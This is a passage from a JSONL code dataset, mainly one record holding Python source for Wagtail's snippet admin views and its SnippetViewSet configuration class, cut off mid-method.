"matplotlib.pyplot.title", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}]} +{"seq_id": "563633634", "text": "import django_filters\nfrom django.apps import apps\nfrom django.contrib.admin.utils import quote, unquote\nfrom django.core import checks\nfrom django.core.exceptions import ImproperlyConfigured, PermissionDenied\nfrom django.http import Http404\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.urls import path, re_path, reverse\nfrom django.utils.text import capfirst\nfrom django.utils.translation import gettext as _\nfrom django.utils.translation import gettext_lazy\n\nfrom wagtail import hooks\nfrom wagtail.admin.checks import check_panels_in_model\nfrom wagtail.admin.filters import DateRangePickerWidget, WagtailFilterSet\nfrom wagtail.admin.menu import Menu, MenuItem, SubmenuMenuItem\nfrom wagtail.admin.panels.group import ObjectList\nfrom wagtail.admin.panels.model_utils import extract_panel_definitions_from_model_class\nfrom wagtail.admin.ui.tables import (\n BulkActionsCheckboxColumn,\n Column,\n DateColumn,\n InlineActionsTable,\n LiveStatusTagColumn,\n TitleColumn,\n UserColumn,\n)\nfrom wagtail.admin.views import generic\nfrom wagtail.admin.views.generic import history, lock, workflow\nfrom 
wagtail.admin.views.generic.permissions import PermissionCheckedMixin\nfrom wagtail.admin.views.generic.preview import (\n PreviewOnCreate,\n PreviewOnEdit,\n PreviewRevision,\n)\nfrom wagtail.admin.views.mixins import SpreadsheetExportMixin\nfrom wagtail.admin.views.reports.base import ReportView\nfrom wagtail.admin.viewsets import viewsets\nfrom wagtail.admin.viewsets.model import ModelViewSet\nfrom wagtail.log_actions import registry as log_registry\nfrom wagtail.models import (\n DraftStateMixin,\n Locale,\n LockableMixin,\n PreviewableMixin,\n RevisionMixin,\n WorkflowMixin,\n)\nfrom wagtail.models.audit_log import ModelLogEntry\nfrom wagtail.permissions import ModelPermissionPolicy\nfrom wagtail.snippets.action_menu import SnippetActionMenu\nfrom wagtail.snippets.models import SnippetAdminURLFinder, get_snippet_models\nfrom wagtail.snippets.permissions import user_can_edit_snippet_type\nfrom wagtail.snippets.side_panels import SnippetSidePanels\nfrom wagtail.snippets.views.chooser import SnippetChooserViewSet\n\n\n# == Helper functions ==\ndef get_snippet_model_from_url_params(app_name, model_name):\n \"\"\"\n Retrieve a model from an app_label / model_name combo.\n Raise Http404 if the model is not a valid snippet type.\n \"\"\"\n try:\n model = apps.get_model(app_name, model_name)\n except LookupError:\n raise Http404\n if model not in get_snippet_models():\n # don't allow people to hack the URL to edit content types that aren't registered as snippets\n raise Http404\n\n return model\n\n\n# == Views ==\n\n\nclass ModelIndexView(generic.IndexView):\n page_title = gettext_lazy(\"Snippets\")\n header_icon = \"snippet\"\n index_url_name = \"wagtailsnippets:index\"\n default_ordering = \"name\"\n\n def setup(self, request, *args, **kwargs):\n super().setup(request, *args, **kwargs)\n self.snippet_types = self._get_snippet_types()\n\n def _get_snippet_types(self):\n return [\n {\n \"name\": capfirst(model._meta.verbose_name_plural),\n \"count\": model.objects.all().count(),\n \"model\": model,\n }\n for model in get_snippet_models()\n if user_can_edit_snippet_type(self.request.user, model)\n ]\n\n def dispatch(self, request, *args, **kwargs):\n if not self.snippet_types:\n raise PermissionDenied\n return super().dispatch(request, *args, **kwargs)\n\n def get_list_url(self, type):\n return reverse(type[\"model\"].snippet_viewset.get_url_name(\"list\"))\n\n def get_queryset(self):\n return None\n\n def get_columns(self):\n return [\n TitleColumn(\n \"name\",\n label=_(\"Name\"),\n get_url=self.get_list_url,\n sort_key=\"name\",\n ),\n Column(\n \"count\",\n label=_(\"Instances\"),\n sort_key=\"count\",\n ),\n ]\n\n def get_context_data(self, **kwargs):\n ordering = self.get_ordering()\n reverse = ordering[0] == \"-\"\n\n if ordering in [\"count\", \"-count\"]:\n snippet_types = sorted(\n self.snippet_types,\n key=lambda type: type[\"count\"],\n reverse=reverse,\n )\n else:\n snippet_types = sorted(\n self.snippet_types,\n key=lambda type: type[\"name\"].lower(),\n reverse=reverse,\n )\n\n return super().get_context_data(object_list=snippet_types)\n\n def get_template_names(self):\n # We use the generic index template instead of model_index.html,\n # but we look for it anyway so users can customise this view's template\n # without having to override the entire view or the generic template.\n return [\n \"wagtailsnippets/snippets/model_index.html\",\n self.template_name,\n ]\n\n\nclass SnippetTitleColumn(TitleColumn):\n cell_template_name = 
\"wagtailsnippets/snippets/tables/title_cell.html\"\n\n\nclass IndexView(\n SpreadsheetExportMixin,\n generic.IndexViewOptionalFeaturesMixin,\n generic.IndexView,\n):\n view_name = \"list\"\n index_results_url_name = None\n delete_url_name = None\n any_permission_required = [\"add\", \"change\", \"delete\"]\n page_kwarg = \"p\"\n table_class = InlineActionsTable\n\n def get_base_queryset(self):\n # Allow the queryset to be a callable that takes a request\n # so that it can be evaluated in the context of the request\n if callable(self.queryset):\n self.queryset = self.queryset(self.request)\n return super().get_base_queryset()\n\n def _get_title_column(self, field_name, column_class=SnippetTitleColumn, **kwargs):\n # Use SnippetTitleColumn class to use custom template\n # so that buttons from snippet_listing_buttons hook can be rendered\n return super()._get_title_column(field_name, column_class, **kwargs)\n\n def get_columns(self):\n return [\n BulkActionsCheckboxColumn(\"checkbox\", accessor=lambda obj: obj),\n *super().get_columns(),\n ]\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context.update(\n {\n \"model_opts\": self.model._meta,\n \"can_add_snippet\": self.permission_policy.user_has_permission(\n self.request.user, \"add\"\n ),\n }\n )\n\n if self.locale:\n context[\"translations\"] = [\n {\n \"locale\": locale,\n \"url\": self.get_index_url() + \"?locale=\" + locale.language_code,\n }\n for locale in Locale.objects.all().exclude(id=self.locale.id)\n ]\n\n return context\n\n def render_to_response(self, context, **response_kwargs):\n if self.is_export:\n return self.as_spreadsheet(\n context[\"object_list\"], self.request.GET.get(\"export\")\n )\n return super().render_to_response(context, **response_kwargs)\n\n\nclass CreateView(generic.CreateEditViewOptionalFeaturesMixin, generic.CreateView):\n view_name = \"create\"\n preview_url_name = None\n permission_required = \"add\"\n template_name = \"wagtailsnippets/snippets/create.html\"\n error_message = gettext_lazy(\"The snippet could not be created due to errors.\")\n\n def run_before_hook(self):\n return self.run_hook(\"before_create_snippet\", self.request, self.model)\n\n def run_after_hook(self):\n return self.run_hook(\"after_create_snippet\", self.request, self.object)\n\n def get_add_url(self):\n url = reverse(self.add_url_name)\n if self.locale:\n url += \"?locale=\" + self.locale.language_code\n return url\n\n def get_success_url(self):\n if self.draftstate_enabled and self.action != \"publish\":\n return super().get_success_url()\n\n # Make sure the redirect to the listing view uses the correct locale\n urlquery = \"\"\n if self.locale and self.object.locale is not Locale.get_default():\n urlquery = \"?locale=\" + self.object.locale.language_code\n\n return reverse(self.index_url_name) + urlquery\n\n def _get_action_menu(self):\n return SnippetActionMenu(self.request, view=self.view_name, model=self.model)\n\n def _get_initial_form_instance(self):\n instance = self.model()\n\n # Set locale of the new instance\n if self.locale:\n instance.locale = self.locale\n\n return instance\n\n def get_form_kwargs(self):\n return {\n **super().get_form_kwargs(),\n \"instance\": self._get_initial_form_instance(),\n \"for_user\": self.request.user,\n }\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n form = context.get(\"form\")\n action_menu = self._get_action_menu()\n side_panels = SnippetSidePanels(\n self.request,\n self.model(),\n self,\n 
show_schedule_publishing_toggle=getattr(\n form, \"show_schedule_publishing_toggle\", False\n ),\n )\n media = context.get(\"media\") + action_menu.media + side_panels.media\n\n context.update(\n {\n \"model_opts\": self.model._meta,\n \"action_menu\": action_menu,\n \"side_panels\": side_panels,\n \"media\": media,\n }\n )\n\n if self.locale:\n context[\"translations\"] = [\n {\n \"locale\": locale,\n \"url\": reverse(self.add_url_name)\n + \"?locale=\"\n + locale.language_code,\n }\n for locale in Locale.objects.all().exclude(id=self.locale.id)\n ]\n\n return context\n\n\nclass EditView(generic.CreateEditViewOptionalFeaturesMixin, generic.EditView):\n view_name = \"edit\"\n history_url_name = None\n preview_url_name = None\n revisions_compare_url_name = None\n usage_url_name = None\n permission_required = \"change\"\n template_name = \"wagtailsnippets/snippets/edit.html\"\n error_message = gettext_lazy(\"The snippet could not be saved due to errors.\")\n\n def run_before_hook(self):\n return self.run_hook(\"before_edit_snippet\", self.request, self.object)\n\n def run_after_hook(self):\n return self.run_hook(\"after_edit_snippet\", self.request, self.object)\n\n def get_history_url(self):\n return reverse(self.history_url_name, args=[quote(self.object.pk)])\n\n def get_usage_url(self):\n return reverse(self.usage_url_name, args=[quote(self.object.pk)])\n\n def _get_action_menu(self):\n return SnippetActionMenu(\n self.request,\n view=self.view_name,\n instance=self.object,\n locked_for_user=self.locked_for_user,\n )\n\n def get_form_kwargs(self):\n return {**super().get_form_kwargs(), \"for_user\": self.request.user}\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n form = context.get(\"form\")\n action_menu = self._get_action_menu()\n side_panels = SnippetSidePanels(\n self.request,\n self.object,\n self,\n show_schedule_publishing_toggle=getattr(\n form, \"show_schedule_publishing_toggle\", False\n ),\n live_object=self.live_object,\n scheduled_object=self.live_object.get_scheduled_revision_as_object()\n if self.draftstate_enabled\n else None,\n )\n media = context.get(\"media\") + action_menu.media + side_panels.media\n\n context.update(\n {\n \"model_opts\": self.model._meta,\n \"action_menu\": action_menu,\n \"side_panels\": side_panels,\n \"history_url\": self.get_history_url(),\n \"usage_url\": self.get_usage_url(),\n \"revisions_compare_url_name\": self.revisions_compare_url_name,\n \"media\": media,\n }\n )\n\n if self.locale:\n context[\"translations\"] = [\n {\n \"locale\": translation.locale,\n \"url\": reverse(\n self.edit_url_name,\n args=[quote(translation.pk)],\n ),\n }\n for translation in self.object.get_translations().select_related(\n \"locale\"\n )\n ]\n\n return context\n\n\nclass DeleteView(generic.DeleteView):\n view_name = \"delete\"\n page_title = gettext_lazy(\"Delete\")\n permission_required = \"delete\"\n header_icon = \"snippet\"\n\n def run_before_hook(self):\n return self.run_hook(\"before_delete_snippet\", self.request, [self.object])\n\n def run_after_hook(self):\n return self.run_hook(\"after_delete_snippet\", self.request, [self.object])\n\n def get_success_message(self):\n return _(\"%(model_name)s '%(object)s' deleted.\") % {\n \"model_name\": capfirst(self.model._meta.verbose_name),\n \"object\": self.object,\n }\n\n\nclass UsageView(generic.UsageView):\n view_name = \"usage\"\n template_name = \"wagtailsnippets/snippets/usage.html\"\n permission_required = \"change\"\n edit_url_name = None\n\n\nclass 
SnippetHistoryReportFilterSet(WagtailFilterSet):\n action = django_filters.ChoiceFilter(\n label=_(\"Action\"),\n choices=log_registry.get_choices,\n )\n user = django_filters.ModelChoiceFilter(\n label=_(\"User\"),\n field_name=\"user\",\n queryset=lambda request: ModelLogEntry.objects.all().get_users(),\n )\n timestamp = django_filters.DateFromToRangeFilter(\n label=_(\"Date\"), widget=DateRangePickerWidget\n )\n\n class Meta:\n model = ModelLogEntry\n fields = [\"action\", \"user\", \"timestamp\"]\n\n\nclass ActionColumn(Column):\n cell_template_name = \"wagtailsnippets/snippets/revisions/_actions.html\"\n\n def __init__(self, *args, object=None, view=None, **kwargs):\n super().__init__(*args, **kwargs)\n self.object = object\n self.view = view\n\n def get_cell_context_data(self, instance, parent_context):\n context = super().get_cell_context_data(instance, parent_context)\n context[\"revision_enabled\"] = isinstance(self.object, RevisionMixin)\n context[\"draftstate_enabled\"] = isinstance(self.object, DraftStateMixin)\n context[\"preview_enabled\"] = isinstance(self.object, PreviewableMixin)\n context[\"can_publish\"] = self.view.user_has_permission(\"publish\")\n context[\"object\"] = self.object\n context[\"view\"] = self.view\n return context\n\n\nclass HistoryView(ReportView):\n view_name = \"history\"\n index_url_name = None\n edit_url_name = None\n revisions_view_url_name = None\n revisions_revert_url_name = None\n revisions_compare_url_name = None\n revisions_unschedule_url_name = None\n any_permission_required = [\"add\", \"change\", \"delete\"]\n template_name = \"wagtailsnippets/snippets/history.html\"\n title = gettext_lazy(\"Snippet history\")\n header_icon = \"history\"\n is_searchable = False\n paginate_by = 20\n filterset_class = SnippetHistoryReportFilterSet\n table_class = InlineActionsTable\n\n def setup(self, request, *args, pk, **kwargs):\n self.pk = pk\n self.object = self.get_object()\n super().setup(request, *args, **kwargs)\n\n def get_object(self):\n object = get_object_or_404(self.model, pk=unquote(self.pk))\n if isinstance(object, DraftStateMixin):\n return object.get_latest_revision_as_object()\n return object\n\n def get_page_subtitle(self):\n return str(self.object)\n\n def get_columns(self):\n return [\n ActionColumn(\n \"message\",\n object=self.object,\n view=self,\n classname=\"title\",\n label=_(\"Action\"),\n ),\n UserColumn(\"user\", blank_display_name=\"system\"),\n DateColumn(\"timestamp\", label=_(\"Date\")),\n ]\n\n def get_context_data(self, *args, object_list=None, **kwargs):\n context = super().get_context_data(*args, object_list=object_list, **kwargs)\n context[\"object\"] = self.object\n context[\"subtitle\"] = self.get_page_subtitle()\n context[\"model_opts\"] = self.model._meta\n return context\n\n def get_queryset(self):\n return log_registry.get_logs_for_instance(self.object).select_related(\n \"revision\", \"user\", \"user__wagtail_userprofile\"\n )\n\n\nclass InspectView(generic.InspectView):\n view_name = \"inspect\"\n any_permission_required = [\"add\", \"change\", \"delete\"]\n\n\nclass PreviewOnCreateView(PreviewOnCreate):\n pass\n\n\nclass PreviewOnEditView(PreviewOnEdit):\n pass\n\n\nclass PreviewRevisionView(PermissionCheckedMixin, PreviewRevision):\n permission_required = \"change\"\n\n\nclass RevisionsCompareView(PermissionCheckedMixin, generic.RevisionsCompareView):\n permission_required = \"change\"\n\n @property\n def edit_label(self):\n return _(\"Edit this %(model_name)s\") % {\n \"model_name\": 
self.model._meta.verbose_name\n }\n\n @property\n def history_label(self):\n return _(\"%(model_name)s history\") % {\n \"model_name\": self.model._meta.verbose_name\n }\n\n\nclass UnpublishView(PermissionCheckedMixin, generic.UnpublishView):\n permission_required = \"publish\"\n\n\nclass RevisionsUnscheduleView(PermissionCheckedMixin, generic.RevisionsUnscheduleView):\n permission_required = \"publish\"\n\n\nclass LockView(PermissionCheckedMixin, lock.LockView):\n permission_required = \"lock\"\n\n def user_has_permission(self, permission):\n if self.request.user.is_superuser:\n return True\n\n if permission == self.permission_required and isinstance(\n self.object, WorkflowMixin\n ):\n current_workflow_task = self.object.current_workflow_task\n if current_workflow_task:\n return current_workflow_task.user_can_lock(\n self.object, self.request.user\n )\n\n return super().user_has_permission(permission)\n\n\nclass UnlockView(PermissionCheckedMixin, lock.UnlockView):\n permission_required = \"unlock\"\n\n def user_has_permission(self, permission):\n if self.request.user.is_superuser:\n return True\n\n if permission == self.permission_required:\n # Allow unlocking even if the user does not have the 'unlock' permission\n # if they are the user who locked the object\n if self.object.locked_by_id == self.request.user.pk:\n return True\n\n if isinstance(self.object, WorkflowMixin):\n current_workflow_task = self.object.current_workflow_task\n if current_workflow_task:\n return current_workflow_task.user_can_unlock(\n self.object, self.request.user\n )\n\n return super().user_has_permission(permission)\n\n\nclass WorkflowActionView(workflow.WorkflowAction):\n pass\n\n\nclass CollectWorkflowActionDataView(workflow.CollectWorkflowActionData):\n pass\n\n\nclass ConfirmWorkflowCancellationView(workflow.ConfirmWorkflowCancellation):\n pass\n\n\nclass WorkflowStatusView(PermissionCheckedMixin, workflow.WorkflowStatus):\n permission_required = \"change\"\n\n\nclass WorkflowPreviewView(workflow.PreviewRevisionForTask):\n pass\n\n\nclass WorkflowHistoryView(PermissionCheckedMixin, history.WorkflowHistoryView):\n permission_required = \"change\"\n\n\nclass WorkflowHistoryDetailView(\n PermissionCheckedMixin, history.WorkflowHistoryDetailView\n):\n permission_required = \"change\"\n\n\nclass SnippetViewSet(ModelViewSet):\n \"\"\"\n A viewset that instantiates the admin views for snippets.\n \"\"\"\n\n #: The model class to be registered as a snippet with this viewset.\n model = None\n\n #: The icon to use across the admin for this snippet type.\n icon = \"snippet\"\n\n #: Register a custom menu item for this snippet type in the admin's main menu.\n add_to_admin_menu = False\n\n #: Register a custom menu item for this snippet type in the admin's \"Settings\" menu.\n #: This takes precedence if both ``add_to_admin_menu`` and ``add_to_settings_menu`` are set to ``True``.\n add_to_settings_menu = False\n\n #: The displayed label used for the menu item that appears in Wagtail's sidebar.\n #: If unset, the title-cased version of the model's :attr:`~django.db.models.Options.verbose_name_plural` will be used.\n menu_label = None\n\n #: The ``name`` argument passed to the ``MenuItem`` constructor, becoming the ``name`` attribute value for that instance.\n #: This can be useful when manipulating the menu items in a custom menu hook, e.g. 
:ref:`construct_main_menu`.\n    #: If unset, a slugified version of the label is used.\n    menu_name = None\n\n    #: An integer determining the order of the menu item, 0 being the first place.\n    #: If the viewset is registered within a :class:`SnippetViewSetGroup`,\n    #: this is ignored and the menu item order is determined by the order of :attr:`~SnippetViewSetGroup.items`.\n    menu_order = None\n\n    #: A subclass of ``wagtail.admin.filters.WagtailFilterSet``, which is a subclass of django-filter's ``FilterSet``. This will be passed to the ``filterset_class`` attribute of the index view.\n    filterset_class = None\n\n    #: A list or tuple, where each item is either:\n    #:\n    #: - The name of a field on the model;\n    #: - The name of a callable or property on the model that accepts a single parameter for the model instance; or\n    #: - An instance of the ``wagtail.admin.ui.tables.Column`` class.\n    #:\n    #: If the name refers to a database field, the ability to sort the listing by the database column will be offered and the field's verbose name will be used as the column header.\n    #:\n    #: If the name refers to a callable or property, an ``admin_order_field`` attribute can be defined on it to point to the database column for sorting.\n    #: A ``short_description`` attribute can also be defined on the callable or property to be used as the column header.\n    #:\n    #: This list will be passed to the ``list_display`` attribute of the index view.\n    #: If left unset, the ``list_display`` attribute of the index view will be used instead, which by default is defined as ``[\"__str__\", wagtail.admin.ui.tables.UpdatedAtColumn()]``.\n    list_display = None\n\n    #: A list or tuple, where each item is the name of a model field of type ``BooleanField``, ``CharField``, ``DateField``, ``DateTimeField``, ``IntegerField`` or ``ForeignKey``.\n    #: Alternatively, it can also be a dictionary that maps a field name to a list of lookup expressions.\n    #: This will be passed as django-filter's ``FilterSet.Meta.fields`` attribute. See the django-filter documentation for more details.\n    #: If ``filterset_class`` is set, this attribute will be ignored.\n    list_filter = None\n\n    #: A list or tuple, where each item is the name of a field, an attribute, or a single-argument callable on the model.\n    list_export = []\n\n    #: The base file name for the exported listing, without extensions. If unset, the model's :attr:`~django.db.models.Options.db_table` will be used instead.\n    export_filename = None\n\n    #: The number of items to display per page in the index view. Defaults to 20.\n    list_per_page = 20\n\n    #: The number of items to display in the chooser view. Defaults to 10.\n    chooser_per_page = 10\n\n    #: The default ordering to use for the index view. Can be a string or a list/tuple in the same format as Django's :attr:`~django.db.models.Options.ordering`.\n    ordering = None\n\n    #: The fields to use for the search in the index view.\n    #: If set to ``None`` and :attr:`search_backend_name` is set to use a Wagtail search backend,\n    #: the ``search_fields`` attribute of the model will be used instead.\n    search_fields = None\n\n    #: The name of the Wagtail search backend to use for the search in the index view.\n    #: If set to a falsy value, the search will fall back to using Django's QuerySet API.\n    search_backend_name = \"default\"\n\n    #: Whether to enable the inspect view. 
Defaults to ``False``.\n    inspect_view_enabled = False\n\n    #: The model fields or attributes to display in the inspect view.\n    #:\n    #: If the field has a corresponding :meth:`~django.db.models.Model.get_FOO_display`\n    #: method on the model, the method's return value will be used instead.\n    #:\n    #: If you have ``wagtail.images`` installed, and the field's value is an instance of\n    #: ``wagtail.images.models.AbstractImage``, a thumbnail of that image will be rendered.\n    #:\n    #: If you have ``wagtail.documents`` installed, and the field's value is an instance of\n    #: ``wagtail.documents.models.AbstractDocument``, a link to that document will be rendered,\n    #: along with the document title, file extension and size.\n    inspect_view_fields = []\n\n    #: The fields to exclude from the inspect view.\n    inspect_view_fields_exclude = []\n\n    #: The URL namespace to use for the admin views.\n    #: If left unset, ``wagtailsnippets_{app_label}_{model_name}`` is used instead.\n    admin_url_namespace = None\n\n    #: The base URL path to use for the admin views.\n    #: If left unset, ``snippets/{app_label}/{model_name}`` is used instead.\n    base_url_path = None\n\n    #: The URL namespace to use for the chooser admin views.\n    #: If left unset, ``wagtailsnippetchoosers_{app_label}_{model_name}`` is used instead.\n    chooser_admin_url_namespace = None\n\n    #: The base URL path to use for the chooser admin views.\n    #: If left unset, ``snippets/choose/{app_label}/{model_name}`` is used instead.\n    chooser_base_url_path = None\n\n    #: The view class to use for the index view; must be a subclass of ``wagtail.snippets.views.snippets.IndexView``.\n    index_view_class = IndexView\n\n    #: The view class to use for the create view; must be a subclass of ``wagtail.snippets.views.snippets.CreateView``.\n    add_view_class = CreateView\n\n    #: The view class to use for the edit view; must be a subclass of ``wagtail.snippets.views.snippets.EditView``.\n    edit_view_class = EditView\n\n    #: The view class to use for the delete view; must be a subclass of ``wagtail.snippets.views.snippets.DeleteView``.\n    delete_view_class = DeleteView\n\n    #: The view class to use for the usage view; must be a subclass of ``wagtail.snippets.views.snippets.UsageView``.\n    usage_view_class = UsageView\n\n    #: The view class to use for the history view; must be a subclass of ``wagtail.snippets.views.snippets.HistoryView``.\n    history_view_class = HistoryView\n\n    #: The view class to use for the inspect view; must be a subclass of ``wagtail.snippets.views.snippets.InspectView``.\n    inspect_view_class = InspectView\n\n    #: The view class to use for previewing revisions; must be a subclass of ``wagtail.snippets.views.snippets.PreviewRevisionView``.\n    revisions_view_class = PreviewRevisionView\n\n    #: The view class to use for comparing revisions; must be a subclass of ``wagtail.snippets.views.snippets.RevisionsCompareView``.\n    revisions_compare_view_class = RevisionsCompareView\n\n    #: The view class to use for unscheduling revisions; must be a subclass of ``wagtail.snippets.views.snippets.RevisionsUnscheduleView``.\n    revisions_unschedule_view_class = RevisionsUnscheduleView\n\n    #: The view class to use for unpublishing a snippet; must be a subclass of ``wagtail.snippets.views.snippets.UnpublishView``.\n    unpublish_view_class = UnpublishView\n\n    #: The view class to use for previewing on the create view; must be a subclass of ``wagtail.snippets.views.snippets.PreviewOnCreateView``.\n    preview_on_add_view_class = PreviewOnCreateView\n\n    #: The view class to use for previewing on the edit view; must be a 
subclass of ``wagtail.snippets.views.snippets.PreviewOnEditView``.\n    preview_on_edit_view_class = PreviewOnEditView\n\n    #: The view class to use for locking a snippet; must be a subclass of ``wagtail.snippets.views.snippets.LockView``.\n    lock_view_class = LockView\n\n    #: The view class to use for unlocking a snippet; must be a subclass of ``wagtail.snippets.views.snippets.UnlockView``.\n    unlock_view_class = UnlockView\n\n    #: The view class to use for performing a workflow action; must be a subclass of ``wagtail.snippets.views.snippets.WorkflowActionView``.\n    workflow_action_view_class = WorkflowActionView\n\n    #: The view class to use for performing a workflow action that returns the validated data in the response; must be a subclass of ``wagtail.snippets.views.snippets.CollectWorkflowActionDataView``.\n    collect_workflow_action_data_view_class = CollectWorkflowActionDataView\n\n    #: The view class to use for confirming the cancellation of a workflow; must be a subclass of ``wagtail.snippets.views.snippets.ConfirmWorkflowCancellationView``.\n    confirm_workflow_cancellation_view_class = ConfirmWorkflowCancellationView\n\n    #: The view class to use for rendering the workflow status modal; must be a subclass of ``wagtail.snippets.views.snippets.WorkflowStatusView``.\n    workflow_status_view_class = WorkflowStatusView\n\n    #: The view class to use for previewing a revision for a specific task; must be a subclass of ``wagtail.snippets.views.snippets.WorkflowPreviewView``.\n    workflow_preview_view_class = WorkflowPreviewView\n\n    #: The view class to use for the workflow history view; must be a subclass of ``wagtail.snippets.views.snippets.WorkflowHistoryView``.\n    workflow_history_view_class = WorkflowHistoryView\n\n    #: The view class to use for the workflow history detail view; must be a subclass of ``wagtail.snippets.views.snippets.WorkflowHistoryDetailView``.\n    workflow_history_detail_view_class = WorkflowHistoryDetailView\n\n    #: The ViewSet class to use for the chooser views; must be a subclass of ``wagtail.snippets.views.chooser.SnippetChooserViewSet``.\n    chooser_viewset_class = SnippetChooserViewSet\n\n    #: The prefix of template names to look for when rendering the admin views.\n    template_prefix = \"wagtailsnippets/snippets/\"\n\n    #: The template to use for the index view.\n    index_template_name = \"\"\n\n    #: The template to use for the results in the index view.\n    index_results_template_name = \"\"\n\n    #: The template to use for the create view.\n    create_template_name = \"\"\n\n    #: The template to use for the edit view.\n    edit_template_name = \"\"\n\n    #: The template to use for the delete view.\n    delete_template_name = \"\"\n\n    #: The template to use for the history view.\n    history_template_name = \"\"\n\n    #: The template to use for the inspect view.\n    inspect_template_name = \"\"\n\n    def __init__(self, model=None, **kwargs):\n        # Allow model to be defined on the class, or passed in via the constructor\n        self.model = model or self.model\n\n        if self.model is None:\n            raise ImproperlyConfigured(\n                \"SnippetViewSet must be passed a model or define a model attribute.\"\n            )\n\n        self.model_opts = self.model._meta\n        self.app_label = self.model_opts.app_label\n        self.model_name = self.model_opts.model_name\n\n        self.preview_enabled = issubclass(self.model, PreviewableMixin)\n        self.revision_enabled = issubclass(self.model, RevisionMixin)\n        self.draftstate_enabled = issubclass(self.model, DraftStateMixin)\n        self.workflow_enabled = issubclass(self.model, WorkflowMixin)\n        self.locking_enabled = issubclass(self.model, 
LockableMixin)\n\n        self.menu_item_is_registered = (\n            self.add_to_admin_menu or self.add_to_settings_menu\n        )\n\n        super().__init__(\n            name=self.get_admin_url_namespace(),\n            url_prefix=self.get_admin_base_path(),\n            **kwargs,\n        )\n\n        if not self.list_display:\n            self.list_display = self.index_view_class.list_display.copy()\n            if self.draftstate_enabled:\n                self.list_display += [LiveStatusTagColumn()]\n\n        # This edit handler has been bound to the model and is used for the views.\n        self._edit_handler = self.get_edit_handler()\n\n    @property\n    def revisions_revert_view_class(self):\n        \"\"\"\n        The view class to use for reverting to a previous revision.\n\n        By default, this class is generated by combining the edit view with\n        ``wagtail.admin.views.generic.mixins.RevisionsRevertMixin``. As a result,\n        this class must be a subclass of ``wagtail.snippets.views.snippets.EditView``\n        and must handle the reversion correctly.\n        \"\"\"\n        revisions_revert_view_class = type(\n            \"_RevisionsRevertView\",\n            (generic.RevisionsRevertMixin, self.edit_view_class),\n            {\"view_name\": \"revisions_revert\"},\n        )\n        return revisions_revert_view_class\n\n    @property\n    def permission_policy(self):\n        return ModelPermissionPolicy(self.model)\n\n    @property\n    def index_view(self):\n        return self.index_view_class.as_view(\n            model=self.model,\n            queryset=self.get_queryset,\n            template_name=self.get_index_template(),\n            header_icon=self.icon,\n            filterset_class=self.filterset_class,\n            permission_policy=self.permission_policy,\n            index_url_name=self.get_url_name(\"list\"),\n            index_results_url_name=self.get_url_name(\"list_results\"),\n            add_url_name=self.get_url_name(\"add\"),\n            edit_url_name=self.get_url_name(\"edit\"),\n            delete_url_name=self.get_url_name(\"delete\"),\n            list_display=self.list_display,\n            list_filter=self.list_filter,\n            list_export=self.list_export,\n            export_filename=self.get_export_filename(),\n            paginate_by=self.list_per_page,\n            default_ordering=self.ordering,\n            search_fields=self.search_fields,\n            search_backend_name=self.search_backend_name,\n        )\n\n    @property\n    def index_results_view(self):\n        return self.index_view_class.as_view(\n            model=self.model,\n            queryset=self.get_queryset,\n            template_name=self.get_index_results_template(),\n            header_icon=self.icon,\n            filterset_class=self.filterset_class,\n            permission_policy=self.permission_policy,\n            index_url_name=self.get_url_name(\"list\"),\n            index_results_url_name=self.get_url_name(\"list_results\"),\n            add_url_name=self.get_url_name(\"add\"),\n            edit_url_name=self.get_url_name(\"edit\"),\n            delete_url_name=self.get_url_name(\"delete\"),\n            list_display=self.list_display,\n            list_filter=self.list_filter,\n            list_export=self.list_export,\n            export_filename=self.get_export_filename(),\n            paginate_by=self.list_per_page,\n            default_ordering=self.ordering,\n            search_fields=self.search_fields,\n            search_backend_name=self.search_backend_name,\n        )\n\n    @property\n    def add_view(self):\n        return self.add_view_class.as_view(\n            model=self.model,\n            template_name=self.get_create_template(),\n            header_icon=self.icon,\n            permission_policy=self.permission_policy,\n            panel=self._edit_handler,\n            form_class=self.get_form_class(),\n            index_url_name=self.get_url_name(\"list\"),\n            add_url_name=self.get_url_name(\"add\"),\n            edit_url_name=self.get_url_name(\"edit\"),\n            preview_url_name=self.get_url_name(\"preview_on_add\"),\n        )\n\n    @property\n    def edit_view(self):\n        # Any parameters passed here must also be passed in revisions_revert_view.\n        return self.edit_view_class.as_view(\n            model=self.model,\n            
template_name=self.get_edit_template(),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n panel=self._edit_handler,\n form_class=self.get_form_class(for_update=True),\n index_url_name=self.get_url_name(\"list\"),\n edit_url_name=self.get_url_name(\"edit\"),\n delete_url_name=self.get_url_name(\"delete\"),\n history_url_name=self.get_url_name(\"history\"),\n preview_url_name=self.get_url_name(\"preview_on_edit\"),\n lock_url_name=self.get_url_name(\"lock\"),\n unlock_url_name=self.get_url_name(\"unlock\"),\n usage_url_name=self.get_url_name(\"usage\"),\n revisions_compare_url_name=self.get_url_name(\"revisions_compare\"),\n revisions_unschedule_url_name=self.get_url_name(\"revisions_unschedule\"),\n workflow_history_url_name=self.get_url_name(\"workflow_history\"),\n confirm_workflow_cancellation_url_name=self.get_url_name(\n \"confirm_workflow_cancellation\"\n ),\n )\n\n @property\n def delete_view(self):\n return self.delete_view_class.as_view(\n model=self.model,\n template_name=self.get_delete_template(),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n index_url_name=self.get_url_name(\"list\"),\n delete_url_name=self.get_url_name(\"delete\"),\n usage_url_name=self.get_url_name(\"usage\"),\n )\n\n @property\n def usage_view(self):\n return self.usage_view_class.as_view(\n model=self.model,\n template_name=self.get_templates(\n \"usage\", fallback=self.usage_view_class.template_name\n ),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n index_url_name=self.get_url_name(\"list\"),\n edit_url_name=self.get_url_name(\"edit\"),\n )\n\n @property\n def history_view(self):\n return self.history_view_class.as_view(\n model=self.model,\n template_name=self.get_history_template(),\n permission_policy=self.permission_policy,\n index_url_name=self.get_url_name(\"list\"),\n 